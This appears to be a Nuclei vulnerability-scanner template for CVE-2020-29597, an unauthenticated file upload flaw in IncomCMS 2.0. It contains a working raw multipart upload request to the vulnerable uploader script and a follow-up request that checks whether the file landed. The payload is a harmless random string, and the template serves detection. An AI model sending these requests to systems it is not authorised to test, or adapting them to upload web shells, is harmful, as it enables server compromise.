id: CVE-2020-29597 info: name: IncomCMS 2.0 - Arbitrary File Upload author: princechaddha severity: critical description: | IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server. remediation: | Apply the latest security patch or update to a version that addresses the vulnerability. reference: - https://github.com/Trhackno/CVE-2020-29597 - https://nvd.nist.gov/vuln/detail/CVE-2020-29597 - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29597 cwe-id: CWE-434 epss-score: 0.81807 epss-percentile: 0.98005 cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: incomcms_project product: incomcms tags: cve,cve2020,incomcms,fileupload,intrusive http: - raw: - | POST /incom/modules/uploader/showcase/script.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt ------WebKitFormBoundaryBEJZt0IK73M2mAbt Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png" Content-Type: text/html {{randstr_2}} ------WebKitFormBoundaryBEJZt0IK73M2mAbt-- - | GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1 Host: {{Hostname}} req-condition: true matchers-condition: and matchers: - type: word part: body_1 words: - '{"status":"1","name":"{{randstr_1}}.png"}' - type: word part: body_2 words: - '{{randstr_2}}' # digest: 4a0a004730450220553e0180e56a2414ee70784168a0b064400f37cee96fec21c0a8e05daac4566a022100f9a8a89aefd2deaecc23a8df79723e4f5d93f1db4de0164ba85c0f36603dc59f:922c64590222798bb761d5b6d8e72950